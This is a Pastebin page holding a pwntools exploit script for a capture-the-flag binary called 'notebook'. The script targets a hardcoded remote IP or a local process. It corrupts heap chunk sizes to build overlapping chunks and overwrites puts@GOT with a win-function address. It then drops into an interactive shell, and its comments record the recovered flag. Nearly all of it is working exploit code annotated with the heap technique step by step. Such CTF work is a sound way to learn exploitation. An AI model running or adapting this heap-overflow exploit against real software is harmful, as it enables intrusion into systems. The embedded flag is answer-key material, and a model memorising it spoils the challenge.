API tools faq
paste
Advertisement
finalshare

notebook

finalshare
Oct 6th, 2018
175
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.95 KB | None | 0 0
raw download clone embed print report
  1. import sys
  2. import time
  3. from pwn import *
  4.  
  5. libc=ELF("./libc-2.27.so")
  6.  
  7. if len(sys.argv) >1:
  8.     flag=1
  9.     r = remote("125.235.240.172", 1337)
  10. else:
  11.     flag=0
  12.     r = process("./notebook",aslr=True)
  13.  
  14. def back():
  15.     r.sendafter('Delete\n','1')
  16. def next():
  17.     r.sendafter('Delete\n','2')
  18. def add(content):
  19.     r.sendafter('Delete\n','3')
  20.     sleep(0.25)
  21.     r.send(content)
  22.  
  23. def addbig(content):
  24.     r.sendafter('Delete\n','4')
  25.     sleep(0.25)
  26.     r.send(content)
  27. def edit(content):
  28.     r.sendafter('Delete\n','5')
  29.     sleep(0.25)
  30.     r.send(content)
  31. def delete():
  32.     r.sendafter('Delete\n','6')
  33.    
  34.  
  35. def main():
  36.     #malloc 5 chunk
  37.     log.info("A=Malloc 1000")
  38.     add("A")
  39.     log.info("B=Malloc 1000")
  40.     add("B")
  41.     log.info("C=Malloc 1000")
  42.     add("C")
  43.     log.info("D=Malloc 1000")
  44.     add("D")
  45.     log.info("E=Malloc 1000")
  46.     add("E")
  47.     log.info("Move currentNode to D")
  48.     back() #Move currentNode to D
  49.     log.info("Delete D")
  50.     log.info("To make sure the chunk 4 not concat with top chunk")
  51.     delete() #delete
  52.     log.info("Move currentNode to B")
  53.     back() #Move currentNode to B
  54.     log.info("Move currentNode to A")
  55.     back() #Move currentNode to A
  56.     log.info("Set size of B to (sizeB+sizeC+PrevInUse+8)")
  57.     log.info("Make sure fake free chunk has size > size the next malloc")
  58.     edit("A"*(992-8)+p64(2017))
  59.     log.info("Move currentNode to B")
  60.     next()
  61.     log.info("Delete B")
  62.     delete()
  63.     log.info("Move currentNode to C")
  64.     next()
  65.     log.info("Move currentNode to E")
  66.     next()
  67.     log.info("Next malloc will has B pointer so we can overflow the C")
  68.    
  69.     addbig("F"*(992-8)+p64(0x03f1)+p64(0x0601020  )+p64(0x601010)+"OVERFLOWED")
  70.    
  71.     log.success("C OVERFLOWED")
  72.     next()
  73.    
  74.     back()
  75.    
  76.     back()
  77.    
  78.     log.info("Now C->fd will point to puts@GOT.PLT")
  79.     next()
  80.    
  81.  
  82.     log.info("Write &canyouruneme to puts@GOT.PLT")
  83.     raw_input("Trigger?")
  84.     edit(p64(0x0400850))
  85.     r.recv()
  86.     log.success("Triggered.")
  87.     r.interactive()
  88.     #cat flag
  89.     #matesctf{i6lULX6Z86JHr5UI4MSP}
  90.    
  91.    
  92.    
  93. if __name__ == "__main__":
  94.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!